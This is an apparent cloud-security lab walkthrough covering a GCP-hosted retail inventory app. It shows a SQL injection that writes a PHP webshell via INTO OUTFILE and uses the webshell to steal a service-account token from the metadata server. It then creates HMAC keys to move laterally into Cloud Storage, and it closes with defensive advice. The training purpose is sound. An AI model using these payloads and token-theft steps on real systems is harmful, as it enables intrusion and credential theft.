Infiltrate GCP via WebApp Exploitation

Scenario

Our team has landed a new engagement. The global retailer client has provided us with a list of IP addresses mapped to their deployed prod and dev applications. These applications are currently accessible from any of their 2000 store locations. You are currently assessing the IP 35.208.91.212. In-scope is the application and any other resources and environments owned by the client that you are able to access.

Walkthrough

Let’s start with a port scan:

└─$ nmap -Pn --top-ports 100 35.208.91.212

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-08 22:26 +06

Nmap scan report for 212.91.208.35.bc.googleusercontent.com (35.208.91.212)

Host is up (0.21s latency).

Not shown: 99 filtered tcp ports (no-response)

PORT STATE SERVICE

80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 6.94 seconds



If we browse to port 80, we see a directory named inventory.



Clicking inventory redirects us to login.php. Trying basic credentials does not work.

The response headers (a PHPSESSID cookie served by Apache) suggest a PHP application, and Wappalyzer also detects PHP. Running whois shows that the IP address falls within the Google Cloud address space.

└─$ curl -I http://35.208.91.212/inventory/

HTTP/1.1 200 OK

Date: Mon, 08 Sep 2025 17:35:53 GMT

Server: Apache/2.4.65 (Debian)

Set-Cookie: PHPSESSID=3kg1sa43np0fm8ut5j5uos8jqj; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Content-Type: text/html; charset=UTF-8
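The whois observation can also be checked offline once the allocated range is known. Below is a minimal sketch using Python's standard `ipaddress` module. The CIDR in `ASSUMED_GCP_RANGES` is an assumption used for illustration, so replace it with the range your own whois lookup reports.

```python
import ipaddress

# Assumed example range: replace with the NetRange/CIDR from your whois output.
ASSUMED_GCP_RANGES = ["35.208.0.0/12"]


def in_any_range(ip: str, cidrs: list[str]) -> bool:
    """Return True if ip falls inside at least one of the given CIDR blocks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(cidr) for cidr in cidrs)


if __name__ == "__main__":
    print(in_any_range("35.208.91.212", ASSUMED_GCP_RANGES))
```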

Let’s start Burp and analyze the application. Brute forcing the login and trying various SQL injection payloads for authentication bypass do not work, so let’s fuzz for other endpoints or files hosted under the web root:

└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://35.208.91.212/inventory/FUZZ -e .conf,.txt,.json,.xml,.yml,.yaml,.env,.sql

/'___\ /'___\ /'___\

/\ \__/ /\ \__/ __ __ /\ \__/

\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\

\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/

\ \_\ \ \_\ \ \____/ \ \_\

\/_/ \/_/ \/___/ \/_/

v2.1.0-dev

________________________________________________

:: Method : GET

:: URL : http://35.208.91.212/inventory/FUZZ

:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt

:: Extensions : .conf .txt .json .xml .yml .yaml .env .sql

:: Follow redirects : false

:: Calibration : false

:: Timeout : 10

:: Threads : 40

:: Matcher : Response status: 200-299,301,302,307,401,403,405,500

________________________________________________

<SNIP>

user [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 464ms]

admin [Status: 301, Size: 324, Words: 20, Lines: 10, Duration: 204ms]

upload [Status: 301, Size: 325, Words: 20, Lines: 10, Duration: 203ms]

css [Status: 301, Size: 322, Words: 20, Lines: 10, Duration: 215ms]

vendor [Status: 301, Size: 325, Words: 20, Lines: 10, Duration: 204ms]

dist [Status: 301, Size: 323, Words: 20, Lines: 10, Duration: 203ms]

backup.sql [Status: 200, Size: 9781, Words: 1107, Lines: 358, Duration: 208ms]


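To make the `-e` option in the ffuf run above concrete: each wordlist entry is requested as-is and again with every extension appended, which is how a word like `backup` turns into a hit on `backup.sql`. The sketch below reproduces only that expansion step; `expand_candidates` is a hypothetical helper name, and the two-word list is a stand-in for the real wordlist.

```python
from typing import Iterator


def expand_candidates(words: list[str], extensions: list[str]) -> Iterator[str]:
    """Yield each word as-is, then the word with every extension appended."""
    for word in words:
        yield word
        for ext in extensions:
            yield f"{word}{ext}"


if __name__ == "__main__":
    base = "http://35.208.91.212/inventory/"
    # Tiny stand-in wordlist; the real run used a SecLists wordlist.
    for path in expand_candidates(["backup", "admin"], [".sql", ".env"]):
        print(base + path)
```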

We find an interesting file named backup.sql, which appears to be a SQL export of the database. It contains users and their password hashes.

Let’s try cracking the hashes. Mode 0 tells hashcat to treat them as raw MD5:

└─$ hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt

hashcat (v6.2.6) starting

<SNIP>

Dictionary cache hit:

* Filename..: /usr/share/wordlists/rockyou.txt

* Passwords.: 14344386

* Bytes.....: 139921520

* Keyspace..: 14344386

f7a8888ca0572161c57653fd3c04e413:<REDACTED>

<SNIP>


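What hashcat does in mode 0 with a wordlist can be sketched in a few lines: hash each candidate with MD5 and compare it to the target. This is only an illustration of the idea, far slower than hashcat. `crack_md5` is a hypothetical helper, and the demo hash is MD5("password"), not a hash from the lab.

```python
import hashlib
from typing import Iterable, Optional


def crack_md5(target_hex: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose MD5 digest equals target_hex, else None."""
    target = target_hex.strip().lower()
    for word in candidates:
        if hashlib.md5(word.encode("utf-8")).hexdigest() == target:
            return word
    return None


if __name__ == "__main__":
    # Demo hash is MD5("password"), not a hash from the lab.
    print(crack_md5("5f4dcc3b5aa765d61d8327deb882cf99", ["123456", "password"]))
```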

We get a hit and can successfully log in as a user.



While analyzing the functionality, we notice that sending a POST request containing a single quote (') to /inventory/user/search_result2.php triggers an error, which suggests SQL injection.



Send the request to Burp. After experimenting with different payloads, we find a working one, a UNION SELECT with seven columns:

search=%27+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-
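Finding the right column count is usually a matter of trying one NULL, then two, and so on until the error disappears. A minimal sketch of generating those probes is shown here; `union_payload` is a hypothetical helper, and the encoding choices (spaces as `+`, commas left literal) are made only to mirror the payload above.

```python
from urllib.parse import quote_plus


def union_payload(columns: int, prefix: str = "") -> str:
    """Build a URL-encoded UNION SELECT probe with the given number of NULL columns."""
    if columns < 1:
        raise ValueError("columns must be at least 1")
    nulls = ",".join(["NULL"] * columns)
    raw = f"{prefix}' UNION SELECT {nulls}-- -"
    # Keep commas literal so the output matches the style of the payload above.
    return quote_plus(raw, safe=",")


if __name__ == "__main__":
    # Print probes for 1 to 7 columns; in this lab the 7-column probe worked.
    for n in range(1, 8):
        print(f"search={union_payload(n)}")
```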

We could use sqlmap, but it would return the same data we already have from backup.sql. We can also retrieve the version of the SQL server.





Let’s see whether we can write to the web root and read back the output of an executed SQL command. The query below writes the output of version() to /var/www/html/test.txt:

search=%27+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,version()+INTO+OUTFILE+'/var/www/html/test.txt'--+-

If we check test.txt, we see the command output.



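We have to adjust our payload so that it returns only a single row. Searching for a value that matches nothing (nonexist) leaves only the row produced by our UNION SELECT: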

search=nonexist%27+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,version()+INTO+OUTFILE+'/var/www/html/val.txt'--+-

Now we can make a request that creates a PHP webshell:

search=nonexist%27+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,"<%3fphp+echo+shell_exec($_GET['cmd'])%3b%3f>"+INTO+OUTFILE+'/var/www/html/shell.php'--+-

After sending the request, we can confirm that the webshell works by requesting shell.php?cmd=id.

It’s usually a good idea to get a reverse shell, which allows us to run interactive commands and more easily enumerate the system and potentially other hosts and applications on the network (especially in an on-premises environment). In the cloud, however, VM instances often have cloud identities associated with them that allow them to access other cloud resources that form part of the distributed system.

Let’s check whether we can query the GCP metadata server to retrieve the VM instance metadata. Requests must include the Metadata-Flavor: Google header, which indicates that they are intended for the GCP metadata server.

└─$ curl 'http://35.208.91.212/shell.php?cmd=curl%20-H%20%22Metadata-Flavor%3A%20Google%22%20%22http%3A%2F%2Fmetadata.google.internal%2FcomputeMetadata%2Fv1%2F%3Frecursive%3Dtrue%26alt%3Dtext%22'

\N \N \N \N \N \N instance/attributes/enable-audit-log TRUE

<SNIP>

instance/name pos-inventory

instance/network-interfaces/0/access-configs/0/external-ip 35.208.91.212

instance/network-interfaces/0/access-configs/0/type ONE_TO_ONE_NAT

instance/network-interfaces/0/dns-servers 169.254.169.254

instance/network-interfaces/0/gateway 10.128.0.1

instance/network-interfaces/0/ip 10.128.0.2

instance/network-interfaces/0/mac 42:01:0a:80:00:02

instance/network-interfaces/0/mtu 1460

instance/network-interfaces/0/network projects/461887398221/networks/default

instance/network-interfaces/0/nic-type NIC_TYPE_UNSPECIFIED

instance/network-interfaces/0/subnetmask 255.255.240.0

<SNIP>

project/project-id gr-prod-2

The request succeeds and returns the values of all VM instance metadata endpoints. We also see the region us-central1, which the company has deployed resources to. We can confirm that the pos-inventory service account in the gr-prod-2 GCP project is associated with the VM:
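Hand-encoding a nested curl command into the cmd parameter is error-prone, so it can help to generate the URL. The sketch below assumes the webshell reads the command from a `cmd` query parameter, as the one created earlier does. `webshell_url` and `metadata_command` are hypothetical helper names.

```python
from urllib.parse import quote

METADATA_URL = (
    "http://metadata.google.internal/computeMetadata/v1/"
    "?recursive=true&alt=text"
)


def metadata_command(url: str = METADATA_URL) -> str:
    """Build the curl command that the webshell should run on the VM."""
    return f'curl -H "Metadata-Flavor: Google" "{url}"'


def webshell_url(shell_url: str, command: str) -> str:
    """Return shell_url with command percent-encoded into the cmd parameter."""
    # safe="" also encodes '/', so the inner URL cannot be confused with the outer one.
    return f"{shell_url}?cmd={quote(command, safe='')}"


if __name__ == "__main__":
    print(webshell_url("http://35.208.91.212/shell.php", metadata_command()))
```

Encoding everything that is not an unreserved character means the `?`, `&`, and `=` of the inner metadata URL cannot be mistaken for part of the webshell's own query string.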

└─$ curl 'http://35.208.91.212/shell.php?cmd=curl%20-H%20Metadata-Flavor:Google%20http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email'

\N \N \N \N \N \N pos-inventory@gr-prod-2.iam.gserviceaccount.com

Let’s get an access token for the service account:

└─$ curl 'http://35.208.91.212/shell.php?cmd=curl%20-H%20Metadata-Flavor:Google%20http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'

\N \N \N \N \N \N {"access_token":"<REDACTED>","expires_in":2292,"token_type":"Bearer"}
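Every webshell response starts with six `\N` markers because INTO OUTFILE wrote the six NULL columns into shell.php ahead of the PHP code. Before the token can be used, the JSON has to be separated from that prefix. Here is a minimal sketch with a hypothetical `extract_json` helper, using a placeholder token value.

```python
import json


def extract_json(raw: str) -> dict:
    """Parse the first JSON object in raw, skipping any leading non-JSON text."""
    start = raw.find("{")
    if start == -1:
        raise ValueError("no JSON object found in response")
    # raw_decode stops at the end of the object, so trailing noise is ignored too.
    obj, _end = json.JSONDecoder().raw_decode(raw[start:])
    return obj


if __name__ == "__main__":
    # Placeholder response in the same shape as the webshell output.
    sample = r'\N \N \N \N \N \N {"access_token":"EXAMPLE","expires_in":2292,"token_type":"Bearer"}'
    print(extract_json(sample)["access_token"])
```

The extracted `access_token` value is what goes into the token file passed to gcloud.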

Save the token to a file (token.txt). Now we can run gcloud for further enumeration. Let’s start with the GCP project’s IAM bindings, which show the roles granted to each principal:

└─$ gcloud projects get-iam-policy gr-prod-2 --format=json --access-token-file token.txt

{

<SNIP>

"bindings": [

{

"members": [

"group:grconsulting@googlegroups.com"

],

"role": "projects/gr-prod-2/roles/CloudRunViewer"

},

{

"members": [

"serviceAccount:pos-inventory@gr-prod-2.iam.gserviceaccount.com"

],

"role": "projects/gr-prod-2/roles/posRoleTesting"

},

{

"members": [

"group:grconsulting@googlegroups.com"

],

"role": "projects/gr-prod-2/roles/projectIamPolicyViewer"

},

{

"members": [

"serviceAccount:service-461887398221@gcp-gae-service.iam.gserviceaccount.com"

],

"role": "roles/appengine.serviceAgent"

},

{

"members": [

"serviceAccount:service-461887398221@gcp-sa-artifactregistry.iam.gserviceaccount.com"

],

"role": "roles/artifactregistry.serviceAgent"

},

{

"members": [

"serviceAccount:pos-inventory@gr-prod-2.iam.gserviceaccount.com"

],

"role": "roles/cloudasset.viewer"

},

{

"members": [

"serviceAccount:461887398221-compute@developer.gserviceaccount.com",

"serviceAccount:461887398221@cloudbuild.gserviceaccount.com"

],

"role": "roles/cloudbuild.builds.builder"

},

{

"members": [

"serviceAccount:service-461887398221@gcp-sa-cloudbuild.iam.gserviceaccount.com"

],

"role": "roles/cloudbuild.serviceAgent"

},

{

"members": [

"serviceAccount:service-461887398221@gcf-admin-robot.iam.gserviceaccount.com"

],

"role": "roles/cloudfunctions.serviceAgent"

},

{

"members": [

"serviceAccount:service-461887398221@compute-system.iam.gserviceaccount.com"

],

"role": "roles/compute.serviceAgent"

},

{

"members": [

"serviceAccount:service-461887398221@containerregistry.iam.gserviceaccount.com"

],

"role": "roles/containerregistry.ServiceAgent"

},

{

"members": [

"serviceAccount:service-461887398221@dlp-api.iam.gserviceaccount.com"

],

"role": "roles/dlp.projectdriver"

},

{

"members": [

"serviceAccount:service-461887398221@dlp-api.iam.gserviceaccount.com"

],

"role": "roles/dlp.serviceAgent"

},

{

"members": [

"serviceAccount:461887398221@cloudservices.gserviceaccount.com",

"serviceAccount:gr-prod-2@appspot.gserviceaccount.com"

],

"role": "roles/editor"

},

{

"members": [

"serviceAccount:service-461887398221@gcp-sa-firestore.iam.gserviceaccount.com"

],

"role": "roles/firestore.serviceAgent"

},

{

"members": [

"user:ian@shopgigantic.com"

],

"role": "roles/iam.principalAccessBoundaryViewer"

},

{

"members": [

"user:ian@shopgigantic.com"

],

"role": "roles/iam.securityAdmin"

},

{

"members": [

"user:ian@shopgigantic.com"

],

"role": "roles/iam.securityReviewer"

},

{

"members": [

"group:grconsulting@googlegroups.com"

],

"role": "roles/logging.privateLogViewer"

},

{

"members": [

"group:grconsulting@googlegroups.com"

],

"role": "roles/logging.viewer"

},

{

"members": [

"serviceAccount:service-461887398221@gcp-sa-networkmanagement.iam.gserviceaccount.com"

],

"role": "roles/networkmanagement.serviceAgent"

},

{

"members": [

"user:ian@shopgigantic.com"

],

"role": "roles/owner"

},

{

"members": [

"serviceAccount:service-461887398221@gcp-sa-pubsub.iam.gserviceaccount.com"

],

"role": "roles/pubsub.serviceAgent"

},

{

"members": [

"serviceAccount:service-461887398221@serverless-robot-prod.iam.gserviceaccount.com"

],

"role": "roles/run.serviceAgent"

},

{

"members": [

"serviceAccount:pos-inventory@gr-prod-2.iam.gserviceaccount.com"

],

"role": "roles/storage.hmacKeyAdmin"

},

{

"members": [

"serviceAccount:inventory-storage@gr-prod-2.iam.gserviceaccount.com"

],

"role": "roles/storage.objectViewer"

},

{

"members": [

"serviceAccount:service-461887398221@gcp-sa-storageinsights.iam.gserviceaccount.com"

],

"role": "roles/storageinsights.serviceAgent"

},

{

"members": [

"serviceAccount:security-audit@gr-prod-1.iam.gserviceaccount.com"

],

"role": "roles/viewer"

},

{

"members": [

"serviceAccount:service-461887398221@gcp-sa-vpcaccess.iam.gserviceaccount.com"

],

"role": "roles/vpcaccess.serviceAgent"

},

{

"members": [

"serviceAccount:service-461887398221@gcp-sa-websecurityscanner.iam.gserviceaccount.com"

],

"role": "roles/websecurityscanner.serviceAgent"

}

],

"etag": "BwY6PDRLWXY=",

"version": 1

}

Let’s focus on the roles granted to our current service account:

└─$ gcloud projects get-iam-policy gr-prod-2 --flatten="bindings[].members" --filter="bindings.members:pos-inventory@gr-prod-2.iam.gserviceaccount.com" --format="table(bindings.role)" --access-token-file token.txt

ROLE

projects/gr-prod-2/roles/posRoleTesting

roles/cloudasset.viewer

roles/storage.hmacKeyAdmin
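The same filtering can be done offline against a saved copy of the JSON policy, which is handy when the access token has expired. Below is a minimal sketch, assuming the policy has the `bindings` / `members` / `role` shape shown earlier. `roles_for_member` is a hypothetical helper.

```python
import json


def roles_for_member(policy: dict, member: str) -> list[str]:
    """Return the sorted roles whose bindings include the given member string."""
    return sorted(
        binding["role"]
        for binding in policy.get("bindings", [])
        if member in binding.get("members", [])
    )


if __name__ == "__main__":
    # Trimmed sample in the shape returned by get-iam-policy --format=json.
    policy = json.loads("""
    {"bindings": [
      {"members": ["serviceAccount:pos-inventory@gr-prod-2.iam.gserviceaccount.com"],
       "role": "roles/cloudasset.viewer"},
      {"members": ["user:ian@shopgigantic.com"], "role": "roles/owner"}
    ]}
    """)
    print(roles_for_member(
        policy, "serviceAccount:pos-inventory@gr-prod-2.iam.gserviceaccount.com"))
```

Note that the member string includes its type prefix (`serviceAccount:`, `user:`, `group:`), exactly as it appears in the policy.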

We see the cloudasset.viewer role, which grants read-only access to Cloud Asset Inventory, a real-time view of all GCP resources and IAM policies across a project, folder, or organization. It is very helpful for gaining situational awareness with the gcloud asset search-all-resources command.

We can’t get information about the posRoleTesting role assigned to our service account, because we lack the iam.roles.get permission:

└─$ gcloud iam roles describe posRoleTesting --project=gr-prod-2 --access-token-file token.txt

ERROR: (gcloud.iam.roles.describe) PERMISSION_DENIED: You don't have permission to get the role at projects/gr-prod-2/roles/posRoleTesting. This command is authenticated with an access token from token.txt specified by the [auth/access_token_file] property.

- '@type': type.googleapis.com/google.rpc.ErrorInfo

domain: iam.googleapis.com

metadata:

permission: iam.roles.get

resource: projects/gr-prod-2/roles/posRoleTesting

reason: IAM_PERMISSION_DENIED

We also have the privileged role roles/storage.hmacKeyAdmin, which allows us to create and delete HMAC keys for all service accounts in the project. GCP HMAC keys consist of an access key and a secret access key and are only used to authenticate requests to Cloud Storage.

We saw that the service account inventory-storage@gr-prod-2.iam.gserviceaccount.com has permission to retrieve bucket objects (but not to list buckets). We can try creating HMAC keys for this account, which would allow us to move laterally to this identity (in the context of Cloud Storage).

└─$ gcloud projects get-iam-policy gr-prod-2 --format=json --access-token-file token.txt

<SNIP>

{

"members": [

"serviceAccount:inventory-storage@gr-prod-2.iam.gserviceaccount.com"

],

"role": "roles/storage.objectViewer"

},

<SNIP>

We can also check which other resources our current identity can see:

└─$ gcloud asset search-all-resources --scope="projects/gr-prod-2" --filter="NOT state:DELETED" --format="table(assetType, name)" --access-token-file token.txt

<SNIP>

We can summarize the results:

| Resource Type | Name | Purpose |
|---|---|---|
| Compute Instance | pos-inventory | VM running the POS app |
| Storage Bucket | gr-inventory-storage | Holds POS/export data |
| Cloud Function | export_sales_to_gcs | Exports data to Cloud Storage |
| Machine Image | pos-inventory | Snapshot of VM disk |
| Disk | instance-20250409-204645 | Backing storage for the VM |

We can try describing the Cloud Function, listing all buckets, or listing the contents of the known bucket, but we don’t have the required permissions:

└─$ gcloud functions describe export_sales_to_gcs --region=us-central1 --access-token-file token.txt

ERROR: (gcloud.functions.describe) ResponseError: status=[403], code=[Ok], message=[Permission 'cloudfunctions.functions.get' denied on 'projects/gr-proj-1/locations/us-central1/functions/export_sales_to_gcs']

└─$ gcloud storage buckets list --project=gr-prod-2 --access-token-file token.txt

ERROR: (gcloud.storage.buckets.list) HTTPError 403: pos-inventory@gr-prod-2.iam.gserviceaccount.com does not have storage.buckets.list access to the Google Cloud project. Permission 'storage.buckets.list' denied on resource (or it may not exist). This command is authenticated with an access token from token.txt specified by the [auth/access_token_file] property.

└─$ gcloud storage ls --access-token-file token.txt gs://gr-inventory-storage

ERROR: (gcloud.storage.ls) [None] does not have permission to access b instance [gr-inventory-storage] (or it may not exist): pos-inventory@gr-prod-2.iam.gserviceaccount.com does not have storage.objects.list access to the Google Cloud Storage bucket. Permission 'storage.objects.list' denied on resource (or it may not exist). This command is authenticated with an access token from token.txt specified by the [auth/access_token_file] property.

Let’s use our storage.hmacKeyAdmin role to create HMAC keys for the inventory-storage@gr-prod-2.iam.gserviceaccount.com account, so that we can enumerate Cloud Storage as that identity:

└─$ curl -X POST \

-H "Authorization: Bearer $(cat token.txt)" \

-H "Content-Type: application/json" \

"https://storage.googleapis.com/storage/v1/projects/gr-prod-2/hmacKeys?serviceAccountEmail=inventory-storage@gr-prod-2.iam.gserviceaccount.com"

{

"kind": "storage#hmacKey",

"metadata": {

"kind": "storage#hmacKeyMetadata",

"accessId": "GOOG1EYI3WR6YGEGRTHPEWC2NY6JVOJHX56MOSOI3GCN37VZKJIE2VFETOVM6",

"projectId": "gr-prod-2",

"id": "gr-prod-2/GOOG1EYI3WR6YGEGRTHPEWC2NY6JVOJHX56MOSOI3GCN37VZKJIE2VFETOVM6",

"selfLink": "https://www.googleapis.com/storage/v1/projects/gr-prod-2/hmacKeys/GOOG1EYI3WR6YGEGRTHPEWC2NY6JVOJHX56MOSOI3GCN37VZKJIE2VFETOVM6",

"serviceAccountEmail": "inventory-storage@gr-prod-2.iam.gserviceaccount.com",

"etag": "YmNiZDBlMWY=",

"state": "ACTIVE",

"timeCreated": "2025-09-09T14:48:27.794Z",

"updated": "2025-09-09T14:48:27.794Z"

},

"secret": "<REDACTED>"

}
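The curl call above is a plain POST with the target service account passed in the query string. A rough Python equivalent of building that request (without sending it) is sketched below using only the standard library. `hmac_create_request` is a hypothetical helper and the token is a placeholder.

```python
import urllib.request
from urllib.parse import urlencode


def hmac_create_request(project: str, sa_email: str, token: str) -> urllib.request.Request:
    """Build (but do not send) the POST that creates an HMAC key for sa_email."""
    query = urlencode({"serviceAccountEmail": sa_email})
    url = f"https://storage.googleapis.com/storage/v1/projects/{project}/hmacKeys?{query}"
    return urllib.request.Request(
        url,
        data=b"",  # empty body; the target account is passed in the query string
        method="POST",
        headers={
            "Authorization": f"Bearer {token}",
            "Content-Type": "application/json",
        },
    )


if __name__ == "__main__":
    req = hmac_create_request(
        "gr-prod-2",
        "inventory-storage@gr-prod-2.iam.gserviceaccount.com",
        "EXAMPLE_TOKEN",  # placeholder, not a real token
    )
    print(req.get_method(), req.full_url)
```

Passing the returned object to `urllib.request.urlopen` would send it. The secret is returned only in this creation response, so it should be saved immediately.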

Now configure gsutil with the access key and secret using the command below, which prompts for both values:

└─$ gsutil config -a

<SNIP>

To make gsutil authenticate with these HMAC keys rather than with gcloud’s credentials, run the command below:

└─$ gcloud config set pass_credentials_to_gsutil false

We still can’t list buckets:

└─$ gsutil ls

AccessDeniedException: 403 AccessDenied

<?xml version='1.0' encoding='UTF-8'?><Error><Code>AccessDenied</Code><Message>Access denied.</Message><Details>inventory-storage@gr-prod-2.iam.gserviceaccount.com does not have storage.buckets.list access to the Google Cloud project. Permission 'storage.buckets.list' denied on resource (or it may not exist).</Details></Error>

But we can access the gr-inventory-storage bucket and see an export of sales data:

└─$ gsutil ls -r gs://gr-inventory-storage

gs://gr-inventory-storage/sales_export_2025-05-09T20-23-41.348737.json

└─$ gsutil cp gs://gr-inventory-storage/sales_export_2025-05-09T20-23-41.348737.json -

[

{

"salesid": 1,

"userid": 2,

"sales_total": 34,

"sales_date": "2025-04-07 16:23:38"

}

<SNIP>

We can assume that the export_sales_to_gcs Cloud Function periodically connects to the database and exports a snapshot to the bucket.

When a Cloud Function is created, Google (against its own best-practice recommendations) also creates a bucket to store the function code, and this bucket has a predictable name in the format gcf-sources-<project_number>-<region>.

We know that the project number is 461887398221 (it appears in the instance metadata and in the IAM policy, whereas the project ID is gr-prod-2) and that resources have been deployed in the us-central1 region. Thus the potential bucket name is:

gcf-sources-461887398221-us-central1
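The bucket name can be derived mechanically from values already collected. The sketch below pulls the numeric identifier (GCP calls it the project number) out of the network path seen in the metadata output and fills in the naming pattern described above. Both function names are hypothetical.

```python
import re


def project_number_from_network(path: str) -> str:
    """Extract the numeric project number from a 'projects/<number>/networks/<name>' path."""
    match = re.fullmatch(r"projects/(\d+)/networks/[^/]+", path)
    if match is None:
        raise ValueError(f"unexpected network path: {path!r}")
    return match.group(1)


def gcf_source_bucket(project_number: str, region: str) -> str:
    """Return the predictable Cloud Functions source bucket name."""
    return f"gcf-sources-{project_number}-{region}"


if __name__ == "__main__":
    number = project_number_from_network("projects/461887398221/networks/default")
    print(gcf_source_bucket(number, "us-central1"))
```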

Recursively listing the contents of this bucket works:

└─$ gsutil ls -r gs://gcf-sources-461887398221-us-central1

gs://gcf-sources-461887398221-us-central1/DO_NOT_DELETE_THE_BUCKET.md

gs://gcf-sources-461887398221-us-central1/export_sales_to_gcs-f12b46c1-2426-47c3-a735-a6bb813da73b/:

gs://gcf-sources-461887398221-us-central1/export_sales_to_gcs-f12b46c1-2426-47c3-a735-a6bb813da73b/version-1/:

gs://gcf-sources-461887398221-us-central1/export_sales_to_gcs-f12b46c1-2426-47c3-a735-a6bb813da73b/version-1/flag.txt

gs://gcf-sources-461887398221-us-central1/export_sales_to_gcs-f12b46c1-2426-47c3-a735-a6bb813da73b/version-1/function-source.zip

gs://gcf-sources-461887398221-us-central1/processCheckout-20c1e62c-12c4-4edb-9173-c3e79e459bec/:

gs://gcf-sources-461887398221-us-central1/processCheckout-20c1e62c-12c4-4edb-9173-c3e79e459bec/version-2/:

gs://gcf-sources-461887398221-us-central1/processCheckout-20c1e62c-12c4-4edb-9173-c3e79e459bec/version-2/function-source.zip

gs://gcf-sources-461887398221-us-central1/processCheckout-20c1e62c-12c4-4edb-9173-c3e79e459bec/version-3/:

gs://gcf-sources-461887398221-us-central1/processCheckout-20c1e62c-12c4-4edb-9173-c3e79e459bec/version-3/function-source.zip

Let’s download the source code of the Cloud Function:

└─$ gsutil cp gs://gcf-sources-461887398221-us-central1/export_sales_to_gcs-f12b46c1-2426-47c3-a735-a6bb813da73b/version-1/function-source.zip .

Copying gs://gcf-sources-461887398221-us-central1/export_sales_to_gcs-f12b46c1-2426-47c3-a735-a6bb813da73b/version-1/function-source.zip...

- [1 files][ 728.0 B/ 728.0 B]

Operation completed over 1 objects/728.0 B.

└─$ unzip function-source.zip

Archive: function-source.zip

inflating: requirements.txt

inflating: main.py

The function connects to the pos database as the export SQL user and exports sales data to the gr-inventory-storage bucket. In practice, we would try the acquired credentials against other cloud and SQL identities in the environment, as password reuse is a very common bad practice.

└─$ cat main.py

import json
import os
import pymysql
from google.cloud import storage
from datetime import datetime

def export_sales_to_gcs(request):
    db_host = "10.128.0.2"
    db_user = "export"
    db_pass = "<REDACTED>"
    db_name = "pos"

    conn = pymysql.connect(
        host=db_host,
        user=db_user,
        password=db_pass,
        database=db_name,
        cursorclass=pymysql.cursors.DictCursor
    )
    cursor = conn.cursor()
    cursor.execute("SELECT * FROM sales")
    records = cursor.fetchall()
    cursor.close()
    conn.close()

    storage_client = storage.Client()
    bucket_name = "gr-inventory-storage"
    bucket = storage_client.get_bucket(bucket_name)
    filename = f"sales_export_{datetime.utcnow().isoformat()}.json"
    blob = bucket.blob(filename)
    blob.upload_from_string(json.dumps(records, indent=2), content_type='application/json')

    return f"Exported {len(records)} records to gs://{bucket_name}/{filename}"
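With only one small file, the hardcoded password is easy to spot by eye. For larger source archives, a quick pattern search can surface similar assignments. The following is a rough sketch rather than a complete secret scanner: the regular expression and the keyword list are assumptions chosen for illustration, and `find_hardcoded_secrets` is a hypothetical helper.

```python
import re

# Hypothetical pattern: variable names that hint at a secret, assigned a string literal.
SECRET_ASSIGNMENT = re.compile(
    r"""^\s*(?P<name>\w*(?:pass|passwd|password|secret|token|key)\w*)\s*=\s*(?P<quote>["'])(?P<value>.*?)(?P=quote)""",
    re.IGNORECASE | re.MULTILINE,
)


def find_hardcoded_secrets(source: str) -> list[tuple[str, str]]:
    """Return (variable name, literal value) pairs for suspicious assignments."""
    return [
        (m.group("name"), m.group("value"))
        for m in SECRET_ASSIGNMENT.finditer(source)
    ]


if __name__ == "__main__":
    # Placeholder source text; the value is made up, not the lab's password.
    sample = 'db_user = "export"\ndb_pass = "example-value"\ndb_name = "pos"\n'
    for name, value in find_hardcoded_secrets(sample):
        print(name, "=", value)
```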



Attack path

Attack path visualization created by Thibault Gardet for Pwned Labs



Defense

Based on the lab’s Defense section.

In this lab we saw how a threat actor could leverage SQL injection to gain command execution and then query the instance metadata service for service account credentials. With these credentials, we were able to gain situational awareness, identify interesting resources and dangerous permissions, move laterally to another service account, and access further credentials by leveraging GCP’s insecure bucket naming conventions.

- Ideally, unless there is a real need to, external keys and Cloud Storage HMAC key generation for service accounts should be disabled.

- It is disabled by default.

- When enabled, it applies to all service accounts, even if only one service account needs keys.

- A maximum of 10 HMAC keys can be created per service account, which can make it more difficult to keep track of who has access to the identity.

- The creation of HMAC keys for user accounts is not available through public APIs.

- These operations are restricted to the Cloud Console’s private backend service and can only be performed through the Interoperability tab in the Cloud Storage console.

- Cloud Logging should also be enabled in the GCP organization and / or project to allow defenders to detect and respond to malicious activity.

With the setting disabled, the command to create new HMAC keys for a service account will fail:

curl -X POST \

-H "Authorization: Bearer $(cat token.txt)" \

-H "Content-Type: application/json" \

"https://storage.googleapis.com/storage/v1/projects/gr-prod-2/hmacKeys?serviceAccountEmail=inventory-storage@gr-prod-2.iam.gserviceaccount.com"

{

"error": {

"code": 412,

"message": "Request violates constraint 'constraints/iam.disableServiceAccountKeyCreation'",

"errors": [

{

"message": "Request violates constraint 'constraints/iam.disableServiceAccountKeyCreation'",

"domain": "global",

"reason": "conditionNotMet",

"locationType": "header",

"location": "If-Match"

}

]

}

}
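Tooling that automates key creation can recognize this failure and report which constraint blocked it. The sketch below parses an error body of the shape shown above. `violated_constraint` is a hypothetical helper, and other error formats are not handled.

```python
import json
import re
from typing import Optional


def violated_constraint(error_body: str) -> Optional[str]:
    """Return the org policy constraint named in a 412 error body, or None."""
    error = json.loads(error_body).get("error", {})
    if error.get("code") != 412:
        return None
    match = re.search(r"'(constraints/[^']+)'", error.get("message", ""))
    return match.group(1) if match else None


if __name__ == "__main__":
    body = json.dumps({
        "error": {
            "code": 412,
            "message": "Request violates constraint "
                       "'constraints/iam.disableServiceAccountKeyCreation'",
        }
    })
    print(violated_constraint(body))
```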